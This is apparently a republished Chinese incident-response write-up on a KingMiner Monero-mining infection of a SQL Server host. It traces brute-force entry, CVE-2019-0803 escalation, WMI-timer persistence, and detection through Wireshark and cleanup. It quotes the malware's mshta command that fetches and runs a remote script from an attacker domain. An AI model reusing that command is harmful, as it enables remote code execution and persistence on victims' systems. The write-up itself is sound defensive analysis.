文章总结： 本文记录了一次针对SQLServer数据库服务器的KingMiner挖矿木马应急响应事件。攻击者通过境外IP对MSSQL进行爆破入侵，成功后下载VBS脚本和tool.exe，利用CVE-2019-0803漏洞提权并植入门罗币挖矿木马，通过WMI定时任务和计划任务实现持久化。由于部分恶意脚本下载失败，仅残留DNS查询行为触发恶意外连告警。排查发现IPS、上网行为管理及火绒均未检出异常，最终通过Wireshark流量分析定位失陷主机，完成断网、查杀和域名封禁处置。 综合评分： 78 文章分类： 应急响应,恶意软件,漏洞分析,实战经验,安全运营

【实战】记一次实战“恶意外连”的大型应急响应事件

F1ne F1ne

只会看监控的实习生

2026年2月7日 08:00 广东

事件背景

忙碌了一天的沐师傅正准备下班，突然一个电话响起XX局被通报《”恶意外连”事件》，需要马上前往客户现场进行应急排查。于是乎沐师傅Wuwuuwu～，背起书包奔赴客户现场。

应急排查

沟通交流

到达现场后，通过与运维人员沟通了解事件原委：客户收到了上级通报称本单位有服务器/主机IP为111.x.x.x存在与恶意域名news.g23xxx.com进行通信行为，疑似遭受木马病毒攻击，需要应急排查事情原委，定位存在异常的主机/服务器。

定位异常主机/服务器

得知IP x.x.x.x为客户互联网出口IP地址，且互联网出入口侧无态势等流量检测设备，通过排查负载、IPS、深信服上网行为管理等日志均未发现内网主机服务器与恶意域名news.g23xxx.com、解析IP（154.x.x.x）相关访问日志。 恶意域名进行分析后发现该恶意域名在威胁情报上被标记为KingMiner挖矿木马，僵尸网络，远控服务器。 对该恶意域名下的木马样本进行粗略查看，判断该挖矿木马是通过UDP协议进行通信，于是想了个办法，用Wireshark旁路到互联网出口上，抓取互联网出口侧全流量，对流量进行过滤筛选udp && frame.contains "g23xxx"，终于发现存在恶意外连的流量请求，成功定位到异常服务器，内网IP地址为10.10.10.10（数据共享平台），为一台SQL Server数据库服务器。

上机排查

遂即上机进行排查，进行日志、样本的提取，经过分析日志发现该主机存在大量恶意Powershell进程 在SQL Server数据库日志中发现该服务器在2022年3月4日11:17:02到2022年5月7日 21:45:15期间遭受来自境外恶意IP62.x.x.x（俄罗斯莫斯科）、62.x.x.x（俄罗斯莫斯科）大量爆破行为，最终爆破成功。 当数据库爆破成功后，该IP在服务器上执行了VBS脚本下载经过base64编码的二进制blob文件，经过解码后保存为C:\\Users\\Public\\Downloads\\\\tool.exe 经过分析该文件tool.exe运行后会利用Windows权限提升漏洞CVE-2019-0803进行攻击，成功利用此漏洞的攻击者可以在内核模式下运行任意代码，然后可以安装程序；查看、更改或删除数据；或创建具有完全用户权限的新帐户。tool.exe在特权模式下执行命令mshta.exe vbscript:GetObject(\\"script:http\[:\]//aa.30583fdae.tk/r1.txt\\")(window.close)，通过mshta.exe执行脚本r1.txt来进行持久化。其中tool.exe所请求域名aa.30583xxxx.tk为门罗币挖矿木马地址，威胁情报已标记为恶意： Tool.exe文件沙箱分析结果：

行为分析：

行为分析图：

程序运行示例图：

其中下载的r1.txt会配置名为WindowsSystemUpdate \_WMITimer的计时器，并将执行一段脚本代码的事件消费者WindowsSystemUpdate\_consumer通过事件过滤器WindowsSystemUpdate\_filter绑定到计时器，从而通过计时器每15分钟执行一次下面的VBS脚本代码： WMI定时任务存在并已清除

后续继续跟进分析发现，可能由于挖矿木马解析IP地址变更，或恶意域名不可达等原因，造成挖矿木马所需的部分程序或脚本未能成功下载到本地，经过排查，仅发现此处tool.exe所创建的wmi启动项，定时通过nslookup查询恶意域名"news.g23xxx.com" DNS记录，造成本服务器访问恶意域名"news.g23xxx.com"触发恶意外连告警。

在此次分析过程中，还发现该服务器还存在其他木马病毒，均已提取出样本并清除： 至此，此次事件初步排查完成，客户已对该服务器进行断网处理，经过全盘木马病毒查杀，启动项删除，并在防火墙上封禁了该恶意域名与IP地址。

应急事件总结

【被攻击服务器】：SQL Server服务器，数据共享平台 【攻击链路】：攻击者针对Windows服务器MSSQL进行爆破攻击，爆破入侵成功后，首先执行一段VBS脚本，检测操作系统版本，并根据不同的系统版本下载不同的Payload文件，利用下载的文件tool.exe进行(CVE-2019-0803)提权以及门罗币挖矿。同时还会安装WMI定时器和Windows计划任务来反复执行指定脚本，执行服务器返回的恶意代码达到持久化攻击的目的； 【木马病毒类型】：挖矿木马，挖矿类型：KingMiner门罗币； 【安全设备运行情况】：IPS、深信服上网行为管理、服务器本地“火绒”杀毒软件未检测出异常； 【处置情况】：已成功定位存在异常的内网服务器，已做断网处理，已进行全盘查杀、日志提取、样本提取等工作，客户反馈该服务器已闲置，后续不再投入使用； 【持续监控】：后续将部署态势感知设备，对恢复后的网站持续监测。

原文链接：https://forum.butian.net/share/2139

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：只会看监控的实习生 F1ne F1ne《【实战】记一次实战“恶意外连”的大型应急响应事件》